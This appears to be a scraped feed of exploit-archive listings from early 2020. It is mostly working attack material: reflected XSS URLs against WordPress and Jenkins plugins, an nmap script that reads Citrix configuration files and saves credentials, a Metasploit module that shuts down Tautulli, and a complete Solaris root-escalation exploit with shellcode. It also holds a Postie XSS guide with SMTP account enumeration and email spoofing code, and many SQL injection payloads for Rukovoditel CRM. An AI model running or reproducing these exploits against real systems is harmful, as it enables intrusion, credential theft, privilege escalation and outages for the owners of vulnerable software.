WordPress Resim ara plugin version 1.0 suffers from a cross site scripting vulnerability.

MD5 | f62ae008fd4742eb0ca199c7ba6a3b11

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Resim ara 1.0

Resim ara is prone to a reflected cross-site scripting vulnerability
because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request GET:
http://localhost//wordpress/wp-content/plugins/resim-ara/y.php?&kelime=VALUE0&kelime=%22%3C%2Fscript%3E%3Cscript%3Ealert%28%22R1XS4.COM%22%29%3C%2Fscript%3E%0A

Source

This is an nmap nse script to test for the path traversal vulnerability in Citrix Application Delivery Controller (ADC) and Gateway.

MD5 | 3d57f69e4e44a43b2e99e03017ca3b2f

# Exploit Title: Path Traversal in Citrix Application Delivery Controller
(ADC) and Gateway.
# Date: 17-12-2019
# CVE: CVE-2019-19781
# Vulenrability: Path Traversal
# Vulnerablity Discovery: Mikhail Klyuchnikov
# Exploit Author: Dhiraj Mishra
# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0
# Vendor Homepage: https://www.citrix.com/
# References: https://support.citrix.com/article/CTX267027
# https://github.com/nmap/nmap/pull/1893

local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local table = require "table"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
local io = require "io"

description = [[
This NSE script checks whether the traget server is vulnerable to
CVE-2019-19781
]]
---
-- @usage
-- nmap --script https-citrix-path-traversal -p
-- nmap --script https-citrix-path-traversal -p --script-args
output='file.txt'
-- @output
-- PORT STATE SERVICE
-- 443/tcp open http
-- | CVE-2019-19781:
-- | Host is vulnerable to CVE-2019-19781
-- @changelog
-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)
-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)
-- @xmloutput
--
-- Citrix ADC Path Traversal aka (Shitrix)
-- VULNERABLE
--

-- Citrix Application Delivery Controller (ADC) and Gateway 10.5,
11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path
-- traversal vulnerability that allows attackers to read configurations or
any other file.
--

--
--

-- 2019
-- 17
-- 12
--

--
-- 17-12-2019
--
--

--
-- https://support.citrix.com/article/CTX267027
-- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
--

--

author = "Dhiraj Mishra (@RandomDhiraj)"
Discovery = "Mikhail Klyuchnikov (@__Mn1__)"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "intrusive","vuln"}

portrule = shortport.ssl

action = function(host,port)
local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
local vuln = {
title = 'Citrix ADC Path Traversal',
state = vulns.STATE.NOT_VULN,
description = [[
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,
12.1, and 13.0 are vulnerable
to a unauthenticated path traversal vulnerability that allows attackers to
read configurations or any other file.
]],
references = {
'https://support.citrix.com/article/CTX267027',
'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
},
dates = {
disclosure = {year = '2019', month = '12', day = '17'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/vpn/../vpns/cfg/smb.conf"
local response
local output = {}
local success = "Host is vulnerable to CVE-2019-19781"
local fail = "Host is not vulnerable"
local match = "[global]"
local credentials
local citrixADC
response = http.get(host, port.number, path)

if not response.status then
stdnse.print_debug("Request Failed")
return
end
if response.status == 200 then
if string.match(response.body, match) then
stdnse.print_debug("%s: %s GET %s - 200 OK",
SCRIPT_NAME,host.targetname or host.ip, path)
vuln.state = vulns.STATE.VULN
citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname
or host.ip,port.number, path))
if outputFile then
credentials = response.body:gsub('%W','.')
vuln.check_results = stdnse.format_output(true, citrixADC)
vuln.extra_info = stdnse.format_output(true, "Credentials are being
stored in the output file")
file = io.open(outputFile, "a")
file:write(credentials, "n")
else
vuln.check_results = stdnse.format_output(true, citrixADC)
end
end
elseif response.status == 403 then
stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname
or host.ip, path, response.status)
vuln.state = vulns.STATE.NOT_VULN
end

return vuln_report:make_output(vuln)
end

Source

Jenkins Gitlab Hook plugin version 1.4.2 suffers from a cross site scripting vulnerability.

MD5 | d7c42a672200860ffa5b54b38f3a89f8

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

Source

This Metasploit module exploits a denial of service vulnerability in Tautulli version 2.1.9.

MD5 | 7276a41dc7e4bd9f641ad047d39d716c

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize
super(
'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
'Author' => 'Ismail Tasdelen',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-19833'],
['EDB', '47785']
]
)
register_options([ Opt::RPORT(8181) ])
end

def run
res = send_request_raw({
'method' => 'GET',
'uri' => '/shutdown'
})

if res
print_status("Request sent to #{rhost}")
else
print_status("No reply from #{rhost}")
end
rescue Errno::ECONNRESET
print_status('Connection reset')
end
end

Source

Online Book Store version 1.0 suffers from an arbitrary file upload vulnerability.

MD5 | c3242a78aae097bf85be645f4e3403ec

# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload 
# Google Dork: N/A
# Date: 2020-01-16
# Exploit Author: Or4nG.M4n aka S4udiExploit
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: MY MIND v1.23.45
# CVE: N/A
# WWW . SEC4EVER . COM
-> hola amigos ^.^
-> just copy this html code






-> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php
# i think am back %^_^%
# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
# big thanks to Stupid Coder ^.^

Source

SunOS version 5.10 Generic_147148-26 local privilege escalation exploit. A buffer overflow in the CheckMonitor() function in the Common Desktop Environment versions 2.3.1 and earlier and 1.6 and earlier, as distributed with Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain root privileges via a long palette name passed to dtsession in a malicious .Xdefaults file.

MD5 | 55c1e1683127ba3a3c82c35279e5e6db

# Exploit: SunOS 5.10 Generic_147148-26 - Local Privilege Escalation
# Date: 2020-01-15
# Author: Marco Ivaldi
# Vendor: www.oracle.com
# Software Link: https://www.oracle.com/technetwork/server-storage/solaris10/downloads/latest-release/index.html
# CVE: CVE-2020-2696

/*
* raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel
* Copyright (c) 2019-2020 Marco Ivaldi
*
* A buffer overflow in the CheckMonitor() function in the Common Desktop
* Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with
* Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain
* root privileges via a long palette name passed to dtsession in a malicious
* .Xdefaults file (CVE-2020-2696).
*
* "I always loved Sun because it was so easy to own. Now with Solaris 11 I
* don't like it anymore." -- ~B.
*
* This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
* protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
* space, try returning to sprintf() instead of strcpy().
*
* I haven't written a Solaris/SPARC version because I don't have a SPARC box
* on which Solaris 10 can run. If anybody is kind enough to give me access to
* such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
*
* Usage:
* $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtsession_ipa 192.168.1.1:0
* [...]
* # id
* uid=0(root) gid=1(other)
* #
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel"
#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi "

#define VULN "/usr/dt/bin/dtsession" // the vulnerable program
#define BUFSIZE 256 // size of the palette name
#define PADDING 3 // padding in the palette name
#define PAYSIZE 1024 // size of the payload
#define OFFSET env_len / 2 // offset to the shellcode

char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"x31xc0x50x50xb0x17xcdx91"
"x31xc0x50x50xb0x17xcdx91"
/* execve() */
"x31xc0x50x68/kshx68/bin"
"x89xe3x50x53x89xe2x50"
"x52x53xb0x3bx50xcdx91";

/* globals */
char *env[256];
int env_pos = 0, env_len = 0;

/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);

/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], payload[PAYSIZE];
char platform[256], release[256], display[256];
int i, payaddr;

char *arg[2] = {"foo", NULL};
int sb = ((int)argv[0] | 0xfff); /* stack base */
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem(); /* rwx memory */

FILE *fp;
char palette_file[BUFSIZE + 18];

/* print exploit information */
fprintf(stderr, "%sn%snn", INFO1, INFO2);

/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:displaynn", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);

/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
memset(payload, 'x90', PAYSIZE);
payload[PAYSIZE - 1] = 0x0;
memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));

/* fill the envp, keeping padding */
add_env(payload);
add_env(display);
add_env("HOME=/tmp");
add_env(NULL);

/* calculate the payload address */
payaddr = sb - OFFSET;

/* prepare the evil palette name */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;

/* fill with function address in ld.so.1, saved eip, and arguments */
for (i = PADDING; i < BUFSIZE - 16; i += 4) {
set_val(buf, i, ret); /* strcpy */
set_val(buf, i += 4, rwx_mem); /* saved eip */
set_val(buf, i += 4, rwx_mem); /* 1st argument */
set_val(buf, i += 4, payaddr); /* 2nd argument */
}

/* prepare the evil .Xdefaults file */
fp = fopen("/tmp/.Xdefaults", "w");
if (!fp) {
perror("error creating .Xdefaults file");
exit(1);
}
fprintf(fp, "*0*ColorPalette: %sn", buf); // or *0*MonochromePalette
fclose(fp);

/* prepare the evil palette file (badchars currently not handled) */
mkdir("/tmp/.dt", 0755);
mkdir("/tmp/.dt/palettes", 0755);
sprintf(palette_file, "/tmp/.dt/palettes/%s", buf);
fp = fopen(palette_file, "w");
if (!fp) {
perror("error creating palette file");
exit(1);
}
fprintf(fp, "Blackn");
fclose(fp);

/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORMt: %s (%s)n", platform, release);
fprintf(stderr, "Using stack baset: 0x%pn", (void *)sb);
fprintf(stderr, "Using rwx_mem addresst: 0x%pn", (void *)rwx_mem);
fprintf(stderr, "Using payload addresst: 0x%pn", (void *)payaddr);
fprintf(stderr, "Using strcpy() addresst: 0x%pnn", (void *)ret);

/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}

/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;

/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}

/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;

/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}

return env_len;
}

/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!n", pattern);
exit(1);
}
}

/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;

/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}

/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}

/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not foundn", sym);
exit(1);
}

/* close the executable object file */
dlclose(handle);

check_zero(addr - 4, sym);
return addr;
}

/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;

/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %sn", tmp);
exit(1);
}

/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);

/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;

return addr_old;
}

/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}

Source

WordPress Postie plugin versions 1.9.40 and below suffer from a persistent cross site scripting vulnerability.

MD5 | 8507d3053d9db85a54c917232bef71d1

# Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
# Google Dork: inurl:/wp-content/plugins/postie/readme.txt
# Date: 2020-01-15
# Exploit Author: V1n1v131r4
# Vendor Homepage: https://postieplugin.com/
# Software Link: https://wordpress.org/plugins/postie/#developers
# Version: <=1.9.40
# Tested on: Linux
# CVE : CVE-2019-20203, CVE-2019-20204

## Identifying WordPress Postie Plugin installation

#!/bin/bash if curl -s -o /dev/null -w "%{http_code}" http:///wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then echo "" echo "Postie installed!" else echo "" echo "Postie seems not to be installed" fi

## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204)

# the syntax below should go as email body

jaVasCript:/*-->

## Email to post on Postie

- Identifying the mail server

dig domain.com mx

- enumerating accounts via SMTP

telnet domain.com 587
EHLO buddy
mail from:
rcpt to:
vrfy user@domain.com


- listing accounts via third party software

You can use these third party software and APIs to enumerate target email users:
- https://www.zerobounce.net
- https://tools.verifyemailaddress.io/
- https://hunter.io/email-verifier



## Spoofing with PHPMailer


<?php

/* CONFIGURE PHP IF NEEDED */
// ini_set("sendmail_from","$fromFull");
// ini_set("SMTP","mail.domain.com");
// ini_set('smtp_port',587);
// ini_set('username',"user");
// ini_set('password',"pass");


// COMPOSE
$to = 'postie@domain.com';
$subject = 'Title of your post';
$message = 'You've been hacked :-)';


// BASIC HEADER
$headers = 'From: wordpress.admin@domain.com' . "rn" .
'Reply-To: wordpress.admin@domain.com' . "rn" .
'X-Mailer: PHP/' . phpversion();


// SEND AND SHOW MESSAGE
if (mail($to, $subject, $message, $headers)) echo $headers.'

Mail sent!

';
else echo '

Something went wrong...

';


// FULL HEADER
// $headers = "From: testsite n";
// $headers .= "Cc: testsite n";
// $headers .= "X-Sender: testsite n";
// $headers .= 'X-Mailer: PHP/' . phpversion();
// $headers .= "X-Priority: 1n";
// $headers .= "Return-Path: mail@testsite.comn";
// $headers .= "MIME-Version: 1.0rn";
// $headers .= "Content-Type: text/html; charset=iso-8859-1n";

?>

Source

Rukovoditel Project Management CRM version 2.5.2 suffers from multiple remote SQL injection vulnerabilities.

MD5 | d1cbf57ffd8df644d5e2b6f3df620f49

# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A

# Request,

POST /ruko/index.php?module=items/listing HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=reports/view&reports_id=68%27
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 330
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver

redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

# PAYLOADS,

# Parameter: reports_id (POST)
# Type: boolean-based blind
# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' RLIKE (SELECT (CASE WHEN (9654=9654) THEN 68 ELSE 0x28 END))-- AlKt&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 8112 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(8112=8112,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rVyr&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: redirect_to=report_68&path=23&reports_entities_id=23&reports_id=68' AND (SELECT 4324 FROM (SELECT(SLEEP(5)))KySi)-- Pfwf&listing_container=entity_items_listing68_23&page=1&search_keywords=cvjm%C3%B6nb%C3%B6m%C3%B6nm&use_search_fields=184&search_in_comments=false&search_in_all=false&search_type_and=false&search_type_match=false&search_reset=&listing_order_fields=&has_with_selected=1



# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A



# Request,
GET /ruko/index.php?module=entities/fields&entities_id=25 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=entities/fields&entities_id=25
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

# PAYLOADS,

# Parameter: entities_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause

Payload: module=entities/fields&entities_id=25' AND 2091=2091 AND 'emRY'='emRY

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: module=entities/fields&entities_id=25' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(2023=2023,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZZpM'='ZZpM

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: module=entities/fields&entities_id=25' AND (SELECT 5681 FROM (SELECT(SLEEP(5)))rdOz) AND 'vWza'='vWza

# Type: UNION query
# Title: Generic UNION query (NULL) - 23 columns

Payload: module=entities/fields&entities_id=25' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706a71,0x5a664143527068525459496254624c514e45694d42776a6d67614a68434c6762434f62514d4f4566,0x7162787871),NULL-- syQw




# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A

# Request,

POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 125
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver

page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D=


# PAYLOADS,

# Parameter: filters[1][value] (POST)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm

# Parameter: filters[0][value] (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1

Source

Proof of concept exploit for the Microsoft Windows CurveBall vulnerability where the signature of certificates using elliptic curve cryptography (ECC) is not correctly verified. ECC relies on different parameters. These parameters are standardized for many curves. However, Microsoft did not check all these parameters. The parameter G (the generator) was not checked, and the attacker can therefore supply his own generator, such that when Microsoft tries to validate the certificate against a trusted CA, it will only look for matching public keys, and then use then use the generator of the certificate.

MD5 | e2fb60e1e15f840f86c3c095bba4a104

Source

This is a proof of concept exploit that demonstrates the Microsoft Windows CryptoAPI spoofing vulnerability as described in CVE-2020-0601 and disclosed by the NSA.

MD5 | d2c133f541a9d87a0a3240f578df147d

Source